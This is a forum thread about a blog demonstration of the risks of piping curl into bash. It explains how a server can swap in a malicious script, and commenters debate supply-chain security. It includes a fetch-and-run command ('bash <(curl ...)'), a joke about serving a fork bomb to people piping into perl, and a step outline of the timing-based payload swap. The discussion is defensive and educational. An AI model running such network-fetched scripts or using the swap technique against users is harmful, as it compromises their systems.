A sneaky demonstration of the dangers of curl bash (blog.k3can.us)
from K3can@lemmy.radio to selfhosted@lemmy.world on 22 Feb 17:38
https://lemmy.radio/post/12010162

I set up a quick demonstration to show risks of curl|bash and how a bad-actor could potentially hide a malicious script that appears safe.

It’s nothing new or groundbreaking, but I figure it never hurts to have another reminder.

#selfhosted

threaded - newest

osanna@thebrainbin.org on 22 Feb 17:39 next collapse

you’d have to be mad to willingly pipe a script to bash without checking it. holy shit

wildbus8979@sh.itjust.works on 22 Feb 17:44 next collapse

And you better inspect and execute a downloaded copy, because a malicious actor can serve a different file for curl/wget than to your browser

Flipper@feddit.org on 22 Feb 17:54 next collapse

They can even serve a different file for curl vs curl|bash

wildbus8979@sh.itjust.works on 22 Feb 18:02 next collapse

Yeah that do, I remember that the demo was pretty impressive ten fifteen years ago!

deadbeef79000@lemmy.nz on 22 Feb 19:48 collapse

Does curl send a different useragent when it’s piped?

Searching for those words just vomits ‘hOW to SeT cUrL’s UseRaGenT’ blog spam.

qupada@fedia.io on 22 Feb 20:30 next collapse

Not that I know of, which means I can only assume it'll be a timing-based attack.

With strategic use of sleep statements in the script you should stand a pretty good chance of detecting the HTTP download blocking while the script execution is paused.

If you were already shipping the kind of script that unpacks a binary payload from the tail end of the file and executes it, it's well within the realm of possibility to swap it for a different one.

Flipper@feddit.org on 22 Feb 21:25 collapse

Its timing based. When piped a script, bash executes each line completly before taking the next line from the input. Curl has a limited output buffer.

  1. Operation that takes a long time. Like a sleep, or if you want it less obvious. A download, an unzip operation, apt update, etc.
  2. Fill the buffer with more bash commands.
  3. Measure on the server if at some point curl stops downloading the script.
  4. Serve a malicious payload.
deadbeef79000@lemmy.nz on 23 Feb 09:44 collapse

Oh that is clever.

K3can@lemmy.radio on 22 Feb 18:00 next collapse

Yep! That’s what the post shows.

I created a live demo file, too, so that you can actually see the difference based on how you request the file.

csm10495@sh.itjust.works on 22 Feb 22:32 collapse

Hit the nail on the head. Download the file, inspect, then run that local copy.

cecilkorik@piefed.ca on 22 Feb 18:53 next collapse

And it’s wild how much even that has been absolutely normalized by all these shitty lazy developers and platforms. Vibe coding it just going to make it worse. All these programs that look nice on the surface and are just slop on the inside. It’s going to be a mess.

BluescreenOfDeath@lemmy.world on 22 Feb 19:06 next collapse

The post is specifically about how you can serve a totally different script than the one you inspect. If you use curl to fetch the script via terminal, the webserver can send a different script to a browser based on the UserAgent.

And whether or not you think someone would be mad to do it, it’s still a widespread practice. The article mentions that piping curl straight to bash is already standard procedure for Proxmox helper scripts. But don’t take anyone’s word for it, check it out:

community-scripts.github.io/ProxmoxVE/

It’s also the recommended method for PiHole:

docs.pi-hole.net/main/basic-install/

mrnobody@reddthat.com on 22 Feb 20:38 collapse

The reality is a lot of newcomers to Linux won’t even understand the risks involved, it’s run because that’s what they’re told or shown to do. That’s what I did for pihole many years ago too, I’ll admit

atzanteol@sh.itjust.works on 22 Feb 21:46 next collapse

I’ve been accused of “gate keeping” when I tell people that this is a shitty way to deploy applications and that nobody should do it.

BluescreenOfDeath@lemmy.world on 23 Feb 14:24 collapse

Users are blameless, I find the fault with the developers.

Asking users to pipe curl to bash because it’s easier for the developer is just the developer being lazy, IMO.

Developers wouldn’t get a free pass for taking lazy, insecure shortcuts in programming, I don’t know why they should get a free pass on this.

jtrek@startrek.website on 22 Feb 19:45 next collapse

Most developers I’ve looked at would happily just paste the curl|bash thing into the terminal.

I often would skim the script in the browser, but a. This post shows that’s not fool proof and b. a sufficiently sophisticated malicious script would fool a casual read

Ephera@lemmy.ml on 22 Feb 21:56 collapse

Most developers I’ve looked at would happily just paste the curl|bash thing into the terminal.

I mean, I typically see it used for installing applications, and so long as TLS is used for the download, I’m still not aware of a good reason why you should check the Bash script in particular in that case, since the application itself could just as well be malware.

Of course, it’s better to check the Bash script than to not check it, but at that point we should also advise to download the source code for the application, review it and then compile it yourself.
At some point, you just have to bite the bullet and I have not yet seen a good argument why the Bash script deserves special treatment here…

Having said that, for cases where you’re not installing an application, yeah, reviewing the script allows you to use it, without having to trust the source to the same degree as you do for installing an application.

Wildmimic@anarchist.nexus on 22 Feb 21:26 next collapse

In addition to the other examples it’s also in the default installation mode for node.js - they use this to install nvm

Ya cant even blame someone non-technical falling for this if they haven’t been explicitly informed - it’s getting reinforced as completely normal by too many “reputable” projects.

porcoesphino@mander.xyz on 22 Feb 22:32 collapse

I’m pretty sure brew on mac is the same too

Dave@lemmy.nz on 22 Feb 21:46 next collapse

Is it different from running a bash script you downloaded without checking it? E.g. the installer that you get with GOG games?

Genuine question, I’m no expert.

osanna@thebrainbin.org on 22 Feb 21:50 next collapse

I have no problems with running scripts from the internet, AFTER you check them. Do NOT blindly run a script you found on the internet. As others have said download them, then check them, then and only then run them if they're safe. NEVER pipe to bash, ever.

Dave@lemmy.nz on 22 Feb 21:52 collapse

Ok but not everyone has that skill. And anyway, how is this different to running a binary where you can’t check the code?

osanna@thebrainbin.org on 22 Feb 21:55 collapse

it's exactly the same. Don't run binaries you don't trust fully. But i get what you mean. miley_cyrus_nude.jpg.exe is probably gonna end badly.

Dave@lemmy.nz on 22 Feb 22:33 collapse

Yeah I get that, but I would install docker, cloudflared, etc by piping a convenience script to bash without hesitation. I’ve already decided to install their binary, I don’t see why the install script is any higher risk.

I know it’s a controversial thing for everyone to make their own call on, I just don’t think the risk for a bash script is any higher than a binary.

osanna@thebrainbin.org on 22 Feb 22:36 next collapse

the difference though is you can check a script. if it’s an open source project, you can also compile from source. but I get what you mean

Dave@lemmy.nz on 22 Feb 22:40 collapse

You can, but to me it seems weird to say it’s crazy to pipe to bash when people happily run binaries. If anything, the convenience script is lower risk than the binary since people have probably checked it before you.

I wouldn’t pipe a random script to bash though, nothing where I wouldn’t trust the people behind it.

moonpiedumplings@programming.dev on 23 Feb 00:01 collapse

I won’t lie, I use curl | bash as well, but I do dislike it for two reasons:

Firstly, it is much, much easier to compromise the website hosting than the binary itself, usually. Distributed binaries are usually signed by multiple keys from multiple servers, resulting in them being highly resistant to tampering. Reproducible builds (two users compiling a program get the same output) make it trivial to detect tampering as well.

On the other hand, websites hosting infrastructure is generally nowhere near as secure. It’s typically one or two VPS’s, and there is no signature or verification that the content is “official”. So even if I’m not tampering with the binary, I can still tamper with the bash script to add extra goodies to it.

On the other hand (but not really relevant to what OP is talking about), just because I trust someone to give me a binary in a mature programming language they have experience writing in, doesn’t mean I trust them to give me a script in a language known for footguns. A steam bug in their bash script once deleted a user’s home directory. There have also been issues with AUR packages, which are basically bash scripts, breaking people’s systems as well. When it comes to user/community created scripts, I mostly trust them to not be malicious, and I am more fearful of a bug or mistake screwing things up. But at the same time, I have little confidence in my ability to spot these bugs.

Generally, I only make an exception for running bash installers if the program being installed is a “platform” that I can use to install more software. K3s (Kubernetes distro), or the Nix package manager are examples. If I can install something via Nix or Docker then it’s going to be installed via there and not installed via curl | bash. Not every developer under the sun should be given the privilege of running a bash script on my system.

As a sidenote, docker doesn’t recommend their install script anymore. All the instructions have been removed from the website, and they recommend adding their own repo’s instead. Personally, I prefer to get it from the distro’s repositories, as usually that’s the simplest and fastest way to install docker nowadays.

Dave@lemmy.nz on 23 Feb 00:15 collapse

Firstly, it is much, much easier to compromise the website hosting than the binary itself, usually. Distributed binaries are usually signed by multiple keys from multiple servers, resulting in them being highly resistant to tampering. Reproducible builds (two users compiling a program get the same output) make it trivial to detect tampering as well.

Yeah this is a fair call.

But at the same time, I have little confidence in my ability to spot these bugs.

This is the key thing for me. I am not likely to spot any issues even if they were there! I’d only be scanning for external connections or obviously malicious code, which I do when I don’t have as much trust in the source.

As a sidenote, docker doesn’t recommend their install script anymore.

Yeah I used it as an example because there are very few times I ever remember piping to bash, but that’s probably the most common one I have done in the past.

surewhynotlem@lemmy.world on 23 Feb 04:16 next collapse

It’s really only about trusting the source. Your operating system surely has thousands of scripts that you’ve never read and never checked. And wouldn’t have time to. And people don’t complain about that.

But it’s really bad practice to run random things from random sites. So the practice of downloading a script and running it is frowned upon. Mostly as a way of maintaining good security hygiene.

axx@slrpnk.net on 23 Feb 09:31 collapse

It is, see github.com/m4tx/curl-bash-attack

Dave@lemmy.nz on 23 Feb 10:11 collapse

That’s an interesting proof of concept, but I don’t think it shows it’s different. That’s a server side attack, whoever has control of the server could just have the script download a malicious binary instead and you wouldn’t be able to tell from the script.

one_knight_scripting@lemmy.world on 22 Feb 23:03 collapse

I mean, true, but most of the things I do that with are private scripts that I wrote. I think the main exception to that is Oh-my-zsh.

Also it’s not really a full pipe…

bash <(curl cht.sh/curl)

That’s saves the URL as a temporary file and opens it with bash. Frankly, the URL I gave you is very bad because it is not actually a script, just the help page for curl. Frankly, it would better if it wasn’t nested.

osanna@thebrainbin.org on 22 Feb 23:07 collapse

the article isn’t about scripts you wrote yourself. run your own scripts all you like.

Decronym@lemmy.decronym.xyz on 22 Feb 20:40 next collapse

Acronyms, initialisms, abbreviations, contractions, and other phrases which expand to something larger, that I’ve seen in this thread:

Fewer Letters More Letters
DNS Domain Name Service/System
HTTP Hypertext Transfer Protocol, the Web
PiHole Network-wide ad-blocker (DNS sinkhole)
SSL Secure Sockets Layer, for transparent encryption
TLS Transport Layer Security, supersedes SSL
VPS Virtual Private Server (opposed to shared hosting)

5 acronyms in this thread; the most compressed thread commented on today has 12 acronyms.

[Thread #111 for this comm, first seen 23rd Feb 2026, 04:40] [FAQ] [Full list] [Contact] [Source code]

quick_snail@feddit.nl on 23 Feb 06:13 collapse

Good bot

krispyavuz@lemmy.world on 23 Feb 03:46 next collapse

Curl bash is no different than running an sh script you dont know manually…

K3can@lemmy.radio on 23 Feb 04:26 next collapse

True, but this is specifically about scripts you think you know, and how curl bash might trick you into running a different script entirely.

axx@slrpnk.net on 23 Feb 09:30 collapse

No, it is different, as it adds an entire layer of indirection and unknown to the mix, increasing the risk in the process.

xylogx@lemmy.world on 23 Feb 05:17 next collapse

Yes this has risks. At the same time anytime you run any piece of software you are facing the same risks, especially if that software is updated from the internet. Take a look at the NIST docs in software supply chain risks.

ShortN0te@lemmy.ml on 23 Feb 05:57 next collapse

Not completely correct. A lot of updaters work with signatures to verify that what was downloaded is signed by the correct key.

With bash curl there is no such check in place.

So strictly speeking it is not the same.

xylogx@lemmy.world on 23 Feb 06:54 collapse

Signatures do not help if your distribution infra gets compromised. See Solarwinds and the more recent node.js incidents.

ShortN0te@lemmy.ml on 23 Feb 07:06 next collapse

This is incorrect. If the update you download is compromised then the signature is invalid and the update fails.

To achieve a compromised update you either need to compromise the update infrastructure AND the key or the infratstructure AND exploit the local updater to accept the invalid or forged signature.

xylogx@lemmy.world on 23 Feb 07:29 collapse

If I can control your infra I can alter what is a valid signature. It has happened. It will happen again. Digital signatures are not sufficient by themselves to prevent supply chain risks. Depending on your threat model, you need to assume advanced adversaries will seek to gain a foothold in your environment by attacking your software supplier. in these types of attacks threat actors can and will take control over the distribution mechanisms deploying trojaned backdoors as part of legitimately signed updates. It is a complex problem and I highly encourage you to read the NIST guidance to understand just how deep the rabbit hole goes.

Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations

ShortN0te@lemmy.ml on 23 Feb 08:44 collapse

No you cannot, the pub key either needs to be present on the updater or uses infrastructure that is not owned by you. Usually how most software suppliers are doing it the public key is supplied within the updater.

xylogx@lemmy.world on 23 Feb 10:00 collapse

Not sure how else to explain this. Look at the CISA bulletin on Shai-Hulud the attacker published valid and signed binaries that were installed by hundreds of users.

"CISA is releasing this Alert to provide guidance in response to a widespread software supply chain compromise involving the world’s largest JavaScript registry, npmjs.com. A self-replicating worm—publicly known as “Shai-Hulud”—has compromised over 500 packages.[i]

After gaining initial access, the malicious cyber actor deployed malware that scanned the environment for sensitive credentials. The cyber actor then targeted GitHub Personal Access Tokens (PATs) and application programming interface (API) keys for cloud services, including Amazon Web Services (AWS), Google Cloud Platform (GCP), and Microsoft Azure.[ii]

The malware then:

  • Exfiltrated the harvested credentials to an endpoint controlled by the actor.
  • Uploaded the credentials to a public repository named Shai-Hulud via the GitHub/user/repos API.
  • Leveraged an automated process to rapidly spread by authenticating to the npm registry as the compromised developer, injecting code into other packages, and publishing compromised versions to the registry.[iii]"
ShortN0te@lemmy.ml on 23 Feb 10:21 collapse

After gaining initial access, the malicious cyber actor deployed malware that scanned the environment for sensitive credentials.

So as I said, the keys got compromised. Thats what i said in the second post.

xylogx@lemmy.world on 23 Feb 11:29 collapse

What you said is the key infra needs to get compromise. I do not need to own the PKI that issued the certs, I just need the private key of the signer. And again, this is something that happens. A lot. A software publisher gets owned, then their account is used to distribute malware.

ShortN0te@lemmy.ml on 23 Feb 11:58 collapse

To achieve a compromised update you either need to compromise the update infrastructure AND the key or the infratstructure AND exploit the local updater to accept the invalid or forged signature.

As i said, to compromise a signature checked update over the internet you need to compromise both, the distributing infrastructure AND the key. With just either one its not possible. (Ignoring flaws in the code ofc)

xylogx@lemmy.world on 23 Feb 13:29 collapse

Take a look at Shai Hulud. All the attacker had was the key.

ShortN0te@lemmy.ml on 23 Feb 15:48 collapse

Yes, the secrets to submit to the distribution system got compromised and therefore the system got compromised.

axx@slrpnk.net on 23 Feb 09:28 collapse

Please tell me you are not seriously equating a highly sophisticated attack line the Solarwind compromise with piping curl to bash?

quick_snail@feddit.nl on 23 Feb 06:12 next collapse

Apt is great

axx@slrpnk.net on 23 Feb 09:27 next collapse

This is a bit like saying crossing the street blindfolded while juggling chainsaws and crossing the street on a pedestrian crossing while the light is red for cars both carry risk. Sure. One’s a terrible idea though.

Nibodhika@lemmy.world on 23 Feb 11:57 collapse

But those are two very different things, I can very easily give you a one liner using curl|bash that will compromise your system, to get the same level of compromise through a proper authenticated channel such as apt/pacman/etc you would need to compromise either their private keys and attack before they notice and change them or stick malicious code in an official package, either of those is orders of magnitude more difficult than writing a simple bash script.

xylogx@lemmy.world on 23 Feb 13:26 collapse

I would feel more comfortable running curl bash from a trusted provider than doing apt get from an unknown software repo. What you are trying to do is establish trust in your supply chain, the delivery vehicle is less important.

Nibodhika@lemmy.world on 23 Feb 23:35 collapse

But what is a trusted provider? How can you trust it? How sure are you that you’re not being MitM? Have you fully manually verified that there’s no funky flags in curl like -k, that the url is using SSL, that it’s a correct url and not pointing at something malicious, etc, etc, etc. There are a lot of manual steps you must verify using this approach, whereas using a package manager all of them get checked automatically, plus some extra checks like hundreds of people validating the content is secure.

To do apt get from an unknown repo, you first need to convince the person to execute root commands they don’t understand on their machine to add that unknown repo, if you can convice someone to run an unsafe command with root credentials then the machine is already compromised.

I get your point, random internet scripts are dangerous but random internet packages can also dangerous. But that’s a false equivalence because there are lots of safeguards to the packages in the usual way people install them, but less than 0 safeguards to the curl|bash. In a similar manner, if this was a post talking about the dangers of fireworks and how you can blow yourself up using them your answer is “but someone can plant a bomb in the mall I go to, or steal the codes for a nuclear missile and blow me up anyways”.

quick_snail@feddit.nl on 23 Feb 06:11 next collapse

Anytime I see a project that had this in their install instructions, I don’t use that project.

It shows how dumb the devs are

axx@slrpnk.net on 23 Feb 09:29 collapse

Yes, this is the correct approach from a security perspective.

quick_snail@feddit.nl on 23 Feb 06:16 next collapse

a more cautious user might first paste the url into the address bar of their web browser to see what the script looks like before running it.

Wow, I never thought anyone would be that dumb.

Why wouldn’t they just wget it, read it, and then execute it?

axx@slrpnk.net on 23 Feb 09:25 collapse

Oh the example in the article is the nice version if this attack.

Checking the script as downloaded by wget or curl and then piping curl to bash is still a terrible idea, as you have no guarantee you’ll get the same script in both cases:

sturmblast@lemmy.world on 23 Feb 07:17 next collapse

You mean blindly running code is bad? /s

oeLLph@feddit.org on 23 Feb 07:18 next collapse

@K3can@lemmy.radio love the early 2000s stylesheet/color theme of your blog 🙂

K3can@lemmy.radio on 23 Feb 08:16 collapse

Thanks! I like to keep things simple. The colors are based on Counter Strike 1.6. 😁

And if you’re into the classic styling, my homepage is a direct homage to my old 2000s sites.

Mister_Hangman@lemmy.world on 24 Feb 10:53 collapse

Hahahaha noticed this too. 1.5 was where it was at tho

ikidd@lemmy.world on 23 Feb 07:42 next collapse

Oh, people will keep using it no matter how much you warn them.

Proxmox-helper-scripts is a perfect example. They’ll agree with you until that site comes up, and then its “it’ll never, ever get hacked and subverted, nope, can’t happen, impossible”.

Wankers.

corsicanguppy@lemmy.ca on 23 Feb 09:07 collapse

I was looking at that very thing last night.

But then I realized, “why can’t immich just create usable packages like we had before?” and noped back out.

But, for a moment, I was sure a little inspection and testing would make the Internet equivalent of NYC MTA coin-sucking magically safe. It looked so eeeeasy.

aeiou_ckr@lemmy.world on 23 Feb 10:39 next collapse

This helped a lot. I had no clue I could post the curl string in the URL bar of a browser to view the script. Thanks for the education!

Nibodhika@lemmy.world on 23 Feb 11:44 next collapse

You didn’t knew that the tool to handle URLs written in C (very creatively named C-Url) was handling URLs? It’s also written in C if you didn’t knew.

smeenz@lemmy.nz on 23 Feb 12:16 next collapse

You had no idea you could paste a url into a browser’s location bar ?

aeiou_ckr@lemmy.world on 24 Feb 10:24 collapse

I wasn’t looking to get roasted for not knowing something. Guess that teaches me something else. Fuck people and thanking them for Shar something I didn’t know. 

smeenz@lemmy.nz on 24 Feb 12:58 collapse

I think the general response is from confusion over what you could possibly have been using the url bar for in your browser if you didn’t know you could put urls there.

floquant@lemmy.dbzer0.com on 23 Feb 14:08 collapse

Shit are URLs esoteric knowledge now?

MehBlah@lemmy.world on 23 Feb 10:47 next collapse

Never have I ever piped curl to bash.

It_Is1_24PM@lemmy.world on 23 Feb 11:06 next collapse

I never thought about opening it in a browser. I always used curl to download such a script and view it where it was supposed to be run.

Buddahriffic@lemmy.world on 23 Feb 15:03 next collapse

An alternative that will avoid the user agent trick is to curl | cat, which just prints the result of the first command to the console. curl >> filename.sh will write it to a script file that you can review and then mark executable and run if you deem it safe, which is safer than doing a curl | cat followed by a curl | bash (because it’s still possible for the 2nd curl to return a different set of commands).

You can control the user agent with curl and spoof a browser’s user agent for one fetch, then a second fetch using the normal curl user agent and compare the results to detect malicious urls in an automated way.

A command line analyzer tool would be nice for people who aren’t as familiar with the commands (and to defeat obfuscation) and arguments, though I believe the problem is NP, so it won’t likely ever be completely foolproof. Though maybe it can be if it is run in a sandbox to see what it does instead of just analyzed.

neidu3@sh.itjust.works on 23 Feb 17:22 next collapse

Running arbitrary text from the internet through an interpreter… what could possibly go wrong.

I need to set up a website with

fork while 1

…Just so I can (try to) convince people to

curl | perl

it

…rhyme intended.

mlg@lemmy.world on 24 Feb 00:06 next collapse

Use our easy bash oneliner to install our software!

Looks inside script

if [ $(command -v apt-get) ]; then apt-get install app; else echo “Unsupported OS”

Still less annoying than trying to build something from source in which the dev claims has like 3 dependencies but in reality requires 500mb of random packages you’ve never even heard of, all while their build system doesn’t do any pre comp checking so the build fails after a solid hours of compilation.

ssfckdt@lemmy.blahaj.zone on 24 Feb 00:29 collapse

I’m a bit lost with

a more cautious user might first paste the url into the address bar of their web browser to see what the script looks like before running it. In the

You… You just… You just dump the curl output to file and examine that and then run it if its good

Just a weird imagined sequence to me.

martini1992@lemmy.ml on 24 Feb 01:26 collapse

Worse than that, the server can change it’s response based on user agent so you need to curl it to a file first, a browser could be served a completely different response.

K3can@lemmy.radio on 24 Feb 02:30 collapse

Which is exactly what is demonstrated in the post. 🙃